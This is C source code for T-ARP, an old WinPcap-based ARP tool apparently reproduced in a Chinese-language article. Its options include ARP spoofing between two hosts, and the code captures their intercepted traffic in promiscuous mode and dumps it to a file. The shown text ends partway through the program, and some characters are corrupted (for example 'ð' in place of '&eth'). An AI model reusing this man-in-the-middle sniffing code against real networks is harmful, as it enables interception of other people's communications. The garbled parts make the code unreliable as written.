五) T-ARP源代码
#include <packet32.h>
#include <ntddndis.h>
#include <stdio.h>
#include <conio.h>
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"packet")
#define ETH_IP 0x0800
#define ETH_ARP 0x0806
#define ARP_REQUEST 0x0001
#define ARP_REPLY 0x0002
#define ARP_HARDWARE 0x0001
#define max_num_adapter 10
#pragma pack(push,1)
typedef struct ethdr
{
unsigned char eh_dst[6];
unsigned char eh_src[6];
unsigned short eh_type;
}ETHDR,*PETHDR;
typedef struct arphdr
{
unsigned short arp_hdr;
unsigned short arp_pro;
unsigned char arp_hln;
unsigned char arp_pln;
unsigned short arp_opt;
unsigned char arp_sha[6];
unsigned long arp_spa;
unsigned char arp_tha[6];
unsigned long arp_tpa;
}ARPHDR,*PARPHDR;
typedef struct iphdr
{
unsigned char h_lenver;
unsigned char tos;
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned char ttl;
unsigned char proto;
unsigned short checksum;
unsigned int sourceip;
unsigned int destip;
}IPHDR,*PIPHDR;
#pragma pack(push)
LPADAPTER lpadapter=0;
LPPACKET lppacketr,lppackets;
ULONG myip,firstip,secondip;
UCHAR mmac[6]={0},fmac[6]={0},smac[6]={0};
BOOL mm=FALSE,fm=FALSE,sm=FALSE;
FILE *fp;
char adapterlist[max_num_adapter][1024];
char msg[50];
int num=0;
void start()
{
printf("T-ARP --- ARP Tools, by TOo2y(ò1é?), 11-9-2002\n");
printf("Homepage: www.safechina.net\n");
printf("E-mail: [email protected]\n");
return ;
}
void usage()
{
printf("\nUsage: T-ARP [-m|-a|-s|-r] firstip secondip \n\n");
printf("Option:\n");
printf(" -m mac Get the mac address from firstip to secondip\n");
printf(" -a antisniff Get the sniffing host from firstip to secondip\n");
printf(" -s spoof 1> Spoof the host between firstip and secondip\n");
printf(" sniff 2> Sniff if firstip == secondip == your own ip\n");
printf(" shock 3> Shock if firstip == secondip != your own ip\n");
printf(" -r reset Reset the spoofed host work normally\n\n");
printf("Attention:\n");
printf(" 1> You must have installed the winpcap_2.3 or winpcap_3.0_alpha\n");
printf(" 2> HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\IPEnableRouter==0x1\n\n");
return ;
}
int getmine()
{
char sendbuf[1024];
int k;
ETHDR eth;
ARPHDR arp;
for(k=0;k<6;k++)
{
eth.eh_dst[k]=0xff;
eth.eh_src[k]=0x82;
arp.arp_sha[k]=0x82;
arp.arp_tha[k]=0x00;
}
eth.eh_type=htons(ETH_ARP);
arp.arp_hdr=htons(ARP_HARDWARE);
arp.arp_pro=htons(ETH_IP);
arp.arp_hln=6;
arp.arp_pln=4;
arp.arp_opt=htons(ARP_REQUEST);
arp.arp_tpa=htonl(myip);
arp.arp_spa=inet_addr("112.112.112.112");
memset(sendbuf,0,sizeof(sendbuf));
memcpy(sendbuf,ð,sizeof(eth));
memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));
PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));
if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE)
{
printf("PacketSendPacket in getmine Error: %d\n",GetLastError());
return -1;
}
return 0;
}
void getdata(LPPACKET lp,int op)
{
ULONG ulbytesreceived,off,tlen,ulen,ulLines;
ULONG j,k;
ETHDR *eth;
ARPHDR *arp;
PIPHDR ip;
char *buf,*pChar,*pLine,*base;
struct bpf_hdr *hdr;
struct sockaddr_in sin;
ulbytesreceived=lp->ulBytesReceived;
buf=(char *)lp->Buffer;
off=0;
while(off<ulbytesreceived)
{
if(kbhit())
{
return ;
}
hdr=(struct bpf_hdr *)(buf+off);
off+=hdr->bh_hdrlen;
pChar=(char *)(buf+off);
base=pChar;
off=Packet_WORDALIGN(off+hdr->bh_caplen);
eth=(PETHDR)pChar;
arp=(PARPHDR)(pChar+sizeof(ETHDR));
if(eth->eh_type==htons(ETH_IP))
{
ip=(PIPHDR)(pChar+sizeof(ETHDR));
if(fm && sm && (op==3))
{
if((((ip->sourceip!=htonl(myip)) && (ip->destip!=htonl(myip))
&& !strcmp((char *)eth->eh_dst,(char *)mmac))
&& ((ip->sourceip==htonl(firstip)) || (ip->destip==htonl(firstip))
|| (ip->sourceip==htonl(secondip)) || (ip->destip==htonl(secondip))))
|| ((firstip==myip) && (secondip==myip)))
{
memset(msg,0,sizeof(msg));
sin.sin_addr.s_addr=ip->sourceip;
printf("[IP:]%16s ---> [IP:]",inet_ntoa(sin.sin_addr));
strcpy(msg,inet_ntoa(sin.sin_addr));
strcat(msg+15," ---> ");
sin.sin_addr.s_addr=ip->destip;
printf("%16s\n",inet_ntoa(sin.sin_addr));
strcat(msg+23,inet_ntoa(sin.sin_addr));
fseek(fp,-2,1);
fwrite("\r\n\r\n\r\n",6,1,fp);
fwrite(msg,38,1,fp);
fwrite("\r\n",2,1,fp);
ulLines=(hdr->bh_caplen+15)/16;
for(k=0;k<ulLines;k++)
{
pLine=pChar;
printf("%08lx : ",pChar-base);
ulen=tlen;
ulen=(ulen>16) ? 16 : ulen;
tlen-=ulen;
for(j=0;j<ulen;j++)
printf("%02x ",*(BYTE *)pChar++);
if(ulen<16)
printf("%*s",(16-ulen)*3," ");
pChar=pLine;
for(j=0;j<ulen;j++,pChar++)
{
printf("%c",isprint(*pChar)? *pChar : '.');
fputc(isprint(*pChar) ? *pChar : '.',fp);
}
printf("\n");
}
printf("\n");
fwrite("\r\n",2,1,fp);
}
}
continue;
}
else if((eth->eh_type==htons(ETH_ARP)) && (arp->arp_opt==htons(ARP_REPLY)))
{
sin.sin_addr.s_addr=arp->arp_spa;
if(sin.sin_addr.s_addr==htonl(myip))
{
memcpy(mmac,eth->eh_src,6);
if(!mm)
{
printf("\t");
for(k=0;k<5;k++)
printf("%.2x-",eth->eh_src[k]);
printf("%.2x\n",eth->eh_src[5]);
switch(op)
{
case 1:
printf("\n[MAC LIST:]");
break;
case 2:
printf("\n[Sniffing Host:]");
break;
default:
break;
}
}
mm=TRUE;
}
if((op==1) || (op==2))
{
printf("\n[IP:] %.16s [MAC:] ",inet_ntoa(sin.sin_addr));
for(k=0;k<5;k++)
printf("%.2x-",eth->eh_src[k]);
printf("%.2x",eth->eh_src[5]);
}
else if(((op==3) || (op==4)) && (!fm || !sm))
{
if(arp->arp_spa==htonl(firstip))
{
memcpy(fmac,eth->eh_src,6);
fm=TRUE;
}
if(arp->arp_spa==htonl(secondip))
{
memcpy(smac,eth->eh_src,6);
sm=TRUE;
}
}
}
}
return ;
}
DWORD WINAPI sniff(LPVOID no)
{
int option=*(int *)no;
char recvbuf[1024*250];
if(PacketSetHwFilter(lpadapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)
{
printf("Warning: Unable to set the adapter to promiscuous mode\n");
}
if(PacketSetBuff(lpadapter,500*1024)==FALSE)
{
printf("PacketSetBuff Error: %d\n",GetLastError());
return -1;
}
if(PacketSetReadTimeout(lpadapter,1)==FALSE)
{
printf("Warning: Unable to set the timeout\n");
}
if((lppacketr=PacketAllocatePacket())==FALSE)
{
printf("PacketAllocatePacket receive Error: %d\n",GetLastError());
return -1;
}
PacketInitPacket(lppacketr,(char *)recvbuf,sizeof(recvbuf));
while(!kbhit())
{
if(PacketReceivePacket(lpadapter,lppacketr,TRUE)==FALSE)
{
if(GetLastError()==6)
return 0;
printf("PacketReceivePacket Error: %d\n",GetLastError());
return -1;
}
getdata(lppacketr,option);
}
return 0;
}
DWORD WINAPI sendMASR(LPVOID no)
{
int fun=*(int *)no;
int k,stimes;
char sendbuf[1024];
ETHDR eth;
ARPHDR arp;
if(fun<1 || fun>4)
{
return -1;
}
else
{
for(k=0;k<6;k++)
{
eth.eh_dst[k]=0xff;
arp.arp_tha[k]=0x00;
}
if(fun==2)
eth.eh_dst[5]=0xfe;
}
memcpy(eth.eh_src,mmac,6);
eth.eh_type=htons(ETH_ARP);
arp.arp_hdr=htons(ARP_HARDWARE);
arp.arp_pro=htons(ETH_IP);
arp.arp_hln=6;
arp.arp_pln=4;
arp.arp_opt=htons(ARP_REQUEST);
arp.arp_spa=htonl(myip);
memcpy(arp.arp_sha,mmac,6);
if(fun==1 || fun==2)
stimes=1;
else if(fun==3 || fun==4)
stimes=2;
for(k=0;k<stimes;k++)
{
if(stimes==1)
{
arp.arp_tpa=htonl(firstip+(num++));
}
else if(stimes==2)
{
switch(k)
{
case 0:
arp.arp_tpa=htonl(firstip);
break;
case 1:
arp.arp_tpa=htonl(secondip);
break;
default:
break;
}
}
memset(sendbuf,0,sizeof(sendbuf));
memcpy(sendbuf,ð,sizeof(eth));
memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));
PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));
if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE)
{
printf("PacketSendPacket in sendMASR Error: %d\n",GetLastError());
return -1;
}
}
return 0;
}